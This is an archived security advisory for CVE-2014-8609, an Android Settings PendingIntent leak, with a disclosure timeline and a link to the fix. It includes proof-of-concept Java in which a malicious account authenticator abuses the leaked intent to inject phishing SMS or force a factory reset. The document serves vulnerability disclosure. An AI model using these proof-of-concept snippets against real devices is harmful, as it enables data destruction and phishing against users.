exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Android Settings Pendingintent Leak

Android Settings Pendingintent Leak
Posted Nov 26, 2014
Authored by WangTao, Zhang Donghui, WangYu

In Android versions prior to 5.0 and possibly greater than and equal to 4.0, Settings application leaks Pendingintent with a blank base intent (neither the component nor the action is explicitly set) to third party applications. Due to this, a malicious app can use this to broadcast intent with the same permissions and identity of the Settings application, which runs as SYSTEM uid.

tags | exploit
advisories | CVE-2014-8609
SHA-256 | cfc2aeebb8ce7b28e800f8cd2c1a2ef4f012afd9da67892dea7842b3fef42e7c

Android Settings Pendingintent Leak

Change Mirror Download

INTRODUCTION
==================================
In Android <5.0 (and maybe >= 4.0), Settings application leaks Pendingintent with a blank base intent (neither the component nor the action is explicitly set) to third party application, bad app can use this to broadcast intent with the same permissions and identity of the Settings application, which runs as SYSTEM uid. Thus bad app can broadcast sensitive intent with the permission of SYSTEM.

DETAILS
==================================
The vulnerability exists in the AddAccountSettings.java in the Settings app:
https://android.googlesource.com/platform/packages/apps/Settings/+/android-4.4.4_r2.0.1/src/com/android/settings/accounts/AddAccountSettings.java

In the method addAccount, a PendingIntent is created by getBroadcast, the problem here is both the action and the component are not explicitly set:

private void addAccount(String accountType) {
Bundle addAccountOptions = new Bundle();
mPendingIntent = PendingIntent.getBroadcast(this, 0, new Intent(), 0);
addAccountOptions.putParcelable(KEY_CALLER_IDENTITY, mPendingIntent);
addAccountOptions.putBoolean(EXTRA_HAS_MULTIPLE_USERS, Utils.hasMultipleUsers(this));
AccountManager.get(this).addAccount(
accountType,
null, /* authTokenType */
null, /* requiredFeatures */
addAccountOptions,
null,
mCallback,
null /* handler */);
mAddAccountCalled = true;
}

This PendingIntent is then stored in the addAccountOptions, which will be sent to another application.

According to android developer guides, this is not secure: (see http://developer.android.com/reference/android/app/PendingIntent.html)
"By giving a PendingIntent to another application, you are granting it the right to perform the operation you have specified as if the other application was yourself (with the same permissions and identity). As such, you should be careful about how you build the PendingIntent: almost always, for example, the base Intent you supply should have the component name explicitly set to one of your own components, to ensure it is ultimately sent there and nowhere else."

The bad app can register as an account authenticator by writing a service with the following intent filter (no permission is needed):

<intent-filter>
<action android:name="android.accounts.AccountAuthenticator" />
</intent-filter>

Then bad app can send an intent to Settings app and request Settings app to add account of requested account type:

Intent intent = new Intent();
intent.setComponent(new ComponentName("com.android.settings","com.android.settings.accounts.AddAccountSettings"));
intent.setAction(Intent.ACTION_RUN);
intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
String authTypes[] = {AccountGeneral.ACCOUNT_TYPE};

intent.putExtra("account_types", authTypes);
startActivity(intent);

Upon receiving such an intent, Settings app will (automatically) call the method addAccount (whose vulnerability is explained as above) and sent the pendingIntent to bad app's addAccount method.

Since the pendingIntent's actions and components are blank, bad app can fillin arbitrary action and extra information into this intent and resending this pending intent, with the permission of SYSTEM.

For example, bad app can create a phishing SMS in the phone with the following POC:

public Bundle addAccount(AccountAuthenticatorResponse response, String accountType, String authTokenType, String[] requiredFeatures, Bundle options) throws NetworkErrorException {
...
PendingIntent pendingIntent = (PendingIntent)options.getParcelable("pendingIntent");
Intent newIntent = new Intent();
newIntent.setAction("android.provider.Telephony.SMS_RECEIVED");
//filling phishing sms pdu data
newIntent.putExtra( "pdus" , new Object[] { pdu });
newIntent.putExtra("format", "3gpp");
try {
pendingIntent.send(mContext, 0, newIntent, null, null);
} catch (CanceledException e) {
// TODO Auto-generated catch block
e.printStackTrace();
}

Or force the phone to factory reset to delete user's data with the following POC:

public Bundle addAccount(AccountAuthenticatorResponse response, String accountType, String authTokenType, String[] requiredFeatures, Bundle options) throws NetworkErrorException {
PendingIntent test = (PendingIntent)options.getParcelable("pendingIntent");
Intent newIntent2 = new Intent("android.intent.action.MASTER_CLEAR");
try {
test.send(mContext, 0, newIntent2, null, null);
} catch (CanceledException e) {
// TODO Auto-generated catch block
e.printStackTrace();
}

This has been fixed in android 5.0 (android bug id 17356824)
https://android.googlesource.com/platform/packages/apps/Settings/+/f5d3e74ecc2b973941d8adbe40c6b23094b5abb7

TIMELINE
==================================
02.09.2014 Initial report to Android Security Team with the phishing SMS POC
03.09.2014 Reply from Android Security Team "opened an internal inquiry about this"
09.09.2014 Find a new factory reset POC and notify Android Security Team
10.09.2014 Reply from Android Security Team "We do acknowledge the issue"
04.11.2014 Android 5.0 source code is open, the fix for this issue is found in change log, ask Android Security Team when this can be published
09.11.2014 Contact MITRE about this issue
20.11.2014 CVE-2014-8609 assigned
25.11.2014 Got Permission from Android Security Team to publish this
26.11.2014 Public Disclosure

IDENTIFIERS
==================================
CVE-2014-8609
Android id 17356824

CREDITS
==================================
WangTao (neobyte) of Baidu X-Team
WangYu of Baidu X-Team
Zhang Donghui of Baidu X-Team


--
BAIDU X-TEAM (xteam.baidu.com)
An external link of this advisory can be found at http://xteam.baidu.com/?p=158


Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    0 Files
  • 20
    Mar 20th
    0 Files
  • 21
    Mar 21st
    0 Files
  • 22
    Mar 22nd
    0 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    0 Files
  • 26
    Mar 26th
    0 Files
  • 27
    Mar 27th
    0 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close